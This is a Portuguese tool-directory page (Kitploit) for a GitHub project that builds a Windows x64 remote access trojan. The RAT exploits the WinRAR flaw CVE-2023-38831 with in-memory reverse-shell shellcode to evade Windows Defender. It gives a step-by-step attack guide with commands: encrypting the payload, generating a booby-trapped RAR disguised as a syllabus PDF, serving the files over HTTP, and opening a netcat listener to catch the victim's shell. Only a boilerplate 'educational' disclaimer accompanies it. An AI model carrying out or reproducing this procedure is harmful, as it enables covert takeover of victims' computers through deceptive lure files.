Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Windows-X64-RAT — Trojan de Acesso Remoto (RAT) para Windows x64 usando uma combinação da vulnerabilidade CVE-2023-38831 (vulnerabilidade WinRAR < 6.23) e técnica de exploração de shellcode. | Kitploit
Ferramentas/GitHubGitHub/maorbuskila/windows-x64-rat
Análise de VulnerabilidadesExploraçãoShellcodeComando e ControleAprendizado e EducaçãoDesenvolvimento de PayloadsCavalo de Troia de Acesso RemotoExploração de Binários
GitHubmaorbuskila/windows-x64-rat

Windows-X64-RAT

Trojan de Acesso Remoto (RAT) para Windows x64 usando uma combinação da vulnerabilidade CVE-2023-38831 (vulnerabilidade WinRAR < 6.23) e técnica de exploração de shellcode.

Ver Repositório
250há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Trojan de Acesso Remoto (RAT) Windows x64

Objetivo

Desenvolver um RAT Windows x64 usando CVE-2023-38831 (WinRAR < 6.23) e exploração de Shellcode para contornar o Windows Defender.

Descrição do Sistema

  1. Inicialização do Shellcode
    • Gerar shellcode usando Windows/x64 - PIC Null-Free TCP Reverse Shell Shellcode.
  2. Explicação do main.cpp
    • Injetar e executar shellcode na memória para estabelecer uma conexão TCP reversa.
  3. Compilar e Criptografar main.cpp
    • Compilar o arquivo C++ em um executável e criptografá-lo.
  4. Explorar WinRAR CVE-2023-38831
    • Usar a vulnerabilidade para baixar, descriptografar e executar o RAT criptografado.
  5. Script de Descriptografia e Execução (decrypt_file.ps1)
    • Descriptografar e executar o executável baixado.
  6. Execução
    • Abrir o PDF/imagem criado para acionar a conexão reversa do shell.

Guia de Exploração

Aviso: Esta informação é apenas para fins educacionais. O uso não autorizado dessas técnicas é ilegal e antiético.

Instruções Passo a Passo

  1. Criar Shellcode

    • Usar 51721.py para gerar o shellcode inicial.
  2. Modificar e Compilar o Shellcode

    • Fazer as modificações necessárias no shellcode.
    • Compilar o código modificado.
  3. Criptografar o Executável

    • Usar decrypt_file.ps1 para criptografar o executável compilado:
      root@kitploit:~
      .\decrypt_file.ps1 -inputFile .\main.exe -outputFile .\enc_main.exe
      
  4. Criar um Arquivo WinRAR

    • Usar cve-2023-38831-exp-gen.py para criar o arquivo:
      root@kitploit:~
      python cve-2023-38831-exp-gen.py NetworkSecuritySyllabus.pdf script.bat NetworkSecuritySyllabus.rar
      
  5. Configurar um Servidor Python para Download de Arquivos

    • Navegar até o diretório contendo enc_main.exe e decrypt_file.ps1.
    • Iniciar um servidor HTTP Python:
      root@kitploit:~
      python3 -m http.server 8000
      
  6. Preparar para Ouvir o Shell TCP Reverso

    • Abrir Netcat para ouvir conexões TCP de entrada:
      root@kitploit:~
      nc -lnvp 4444
      
  7. Acionar o Shell TCP Reverso

    • Quando a vítima abrir o arquivo PDF, a conexão TCP reversa será acionada, concedendo acesso à máquina dela.

Aviso Legal

Esta informação é fornecida apenas para fins educacionais. O uso deste exploit sem permissão explícita é ilegal e antiético. O autor não assume nenhuma responsabilidade por qualquer uso inadequado desta informação.

Baixar ferramenta